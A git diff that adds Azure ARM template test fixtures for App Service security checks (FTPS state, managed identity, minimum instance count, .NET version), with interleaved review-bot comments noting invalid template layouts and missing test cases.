"kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json b/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json index 074e4fdfded..04a41face4c 100644 --- a/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json +++ b/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json 
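Review bot: The passing fixture's only concrete value is `"allowedOrigins": ["is try string to app service disallow cors"]`, which is not an origin at all, so the file does not show what a compliant configuration looks like; a realistic value such as `"allowedOrigins": ["https://app.example.com"]` documents the intent without changing the verdict. Every other property is still the schema placeholder (`"bool"`, `"string"`), which is fine for the check but makes the one real value stand out as the thing under test, so it should be a plausible one. If the check treats a missing `cors` block as compliant, a second pass fixture without `cors` would pin that path, since absence is the most common real-world shape; whether it does is not visible in this hunk.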
@@ -111,7 +111,7 @@
 "index.php",
 "hostingstart.html"
 ],
- "netFrameworkVersion": "v7.0",
+ "netFrameworkVersion": "v8.0",
 "phpVersion": "5.6",
 "requestTracingEnabled": true,
 "requestTracingExpirationTime": "9999-12-31T23:59:00Z",
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/fail.json b/tests/arm/checks/resource/example_AppServiceFTPSState/fail.json
new file mode 100644
index 00000000000..1aabdaa8313
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/fail.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "fail",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]",
+ "siteConfig": {
+ "ftpsState": "Enabled"
+ }
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/fail2.json b/tests/arm/checks/resource/example_AppServiceFTPSState/fail2.json
new file mode 100644
index 00000000000..edd918f12d5
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/fail2.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]",
+ "siteConfig": {}
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
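Review bot: `publisherEmail`, `publisherName` and `customProperties` under `properties` are API Management properties with no meaning on a `Microsoft.Web/sites` resource, and the `adminEmail`/`organizationName`/`customProperties` parameters they reference are not declared, so this template would not deploy as written. The check only reads `siteConfig.ftpsState`, so the verdict is unaffected, but fixtures double as documentation of what the check expects; dropping those three lines leaves a minimal, valid template. The same copy-paste block appears in the sibling fail2/fail3/pass fixtures of this commit.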
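Review bot: This fixture covers an empty `"siteConfig": {}`, but none of the new FTPSState fixtures covers a site with no `siteConfig` key at all, which is the more common template shape and is the path where a check that indexes `properties['siteConfig']` without a guard would raise instead of failing the resource. A `fail4.json` identical to this one minus the `"siteConfig": {}` line would pin that behaviour. Whether the check treats absence as a failure is not visible in this hunk, so the expected verdict should be confirmed against the check's default handling before the fixture is named.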
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/fail3.json b/tests/arm/checks/resource/example_AppServiceFTPSState/fail3.json
new file mode 100644
index 00000000000..fc85635e354
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/fail3.json
@@ -0,0 +1,28 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "fail3",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]",
+ "siteConfig": {
+ "ftpsState": "Enabled",
+ "appSettings": [
+ {
+ "name": "WEBSITE_NODE_DEFAULT_VERSION",
+ "value": "14.17.0"
+ }
+ ]
+ },
+ "linuxFxVersion": "NODE|14-lts"
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/pass.json b/tests/arm/checks/resource/example_AppServiceFTPSState/pass.json
new file mode 100644
index 00000000000..d9c43d9d324
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/pass.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]",
+ "siteConfig": {
+ "ftpsState": "Disabled"
+ }
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/pass2.json b/tests/arm/checks/resource/example_AppServiceFTPSState/pass2.json
new file mode 100644
index 00000000000..97c115d60c3
--- /dev/null
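Review bot: `"linuxFxVersion": "NODE|14-lts"` is placed directly under `properties`, but in the `Microsoft.Web/sites` schema it belongs under `properties.siteConfig` next to `ftpsState`; as written the template models an invalid layout even though the ftpsState verdict is unchanged. Moving that one line into the `siteConfig` object keeps the fixture deployable and avoids suggesting to readers that the top-level placement is accepted. `pass3.json` in this commit has the same misplacement.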
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/pass2.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass2",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]",
+ "siteConfig": {
+ "ftpsState": "FtpsOnly"
+ }
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/pass3.json b/tests/arm/checks/resource/example_AppServiceFTPSState/pass3.json
new file mode 100644
index 00000000000..1cae4c8252b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/pass3.json
@@ -0,0 +1,28 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass3",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]",
+ "siteConfig": {
+ "ftpsState": "Disabled",
+ "appSettings": [
+ {
+ "name": "WEBSITE_NODE_DEFAULT_VERSION",
+ "value": "14.17.0"
+ }
+ ]
+ },
+ "linuxFxVersion": "NODE|14-lts"
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json
new file mode 100644
index 00000000000..14ae320416e
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json
@@ -0,0 +1,74 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "fail",
+ "location": "[parameters('location')]",
+ "kind": "app",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2"
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json
new file mode 100644
index 00000000000..523423b63a5
--- /dev/null
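Review bot: The failing case only exercises the absence of the `identity` key; there is no fixture for `"identity": { "type": "None" }`, which is the explicit opt-out form and is exactly what a check that tests only for the key's presence would wrongly pass. Adding a `fail2.json` with that block would pin it, assuming the check is meant to fail it; the check body is not in this hunk. Separately, `"http20Enabled": "true"` is a quoted string while the sibling `"clientCertEnabled": true` is a real boolean; harmless for this check but inconsistent within one fixture.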
+++ b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json
@@ -0,0 +1,76 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))] "
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "pass",
+ "location": "[parameters('location')]",
+ "kind": "app",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2"
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
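Review bot: `"appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))] "` carries a trailing space inside the string, and ARM only evaluates a string as an expression when it begins with `[` and ends with `]`, so this variable becomes the literal text and the `resourceId(...)` references in `dependsOn` and `serverFarmId` no longer resolve to the serverfarm declared above. The check's verdict does not depend on it, but the pass fixture is meant to be a valid template; drop the space: `"appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"`. The fail.json counterpart in this commit has the correct form.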
diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail.json new file mode 100644 index 00000000000..a43c3c3cd38 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail.json 
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "1.1", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": 1, + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail2.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail2.json new file mode 100644 index 00000000000..3eb6b4de590 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail2.json 
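Review bot: Besides `"numberOfWorkers": 1`, the only non-placeholder value in this fixture is `"minTlsVersion": "1.1"`, which is unrelated to the instance-minimum check and reads as if TLS were part of the failing condition; resetting it to the placeholder `"minTlsVersion": "string"` (or a compliant value) keeps the fixture about one thing. Failing at 1 implies the threshold is at least 2, but the pass fixture's `numberOfWorkers` is outside this chunk, so I cannot tell whether the boundary value is pinned; a pass case at exactly the minimum would fix the comparison operator. The same `minTlsVersion` leftover appears in fail2.json.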
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "1.1", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": 0, + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass.json new file mode 100644 index 00000000000..fca477d9d8c --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass.json 
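Review bot: This fixture switches the resource type to `Microsoft.Web/sites/slots` with `"numberOfWorkers": 0`; if the check's supported resources do not include slots, the resource is skipped rather than failed, and the test only notices if it asserts that `fail2` appears in the failed set, which is not visible here. A slot's `name` is also expected in `site/slot` form rather than `fail2`; the scanner does not care, but the fixture should look deployable. As with fail.json, `"minTlsVersion": "1.1"` is an unrelated leftover that should go back to the placeholder.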
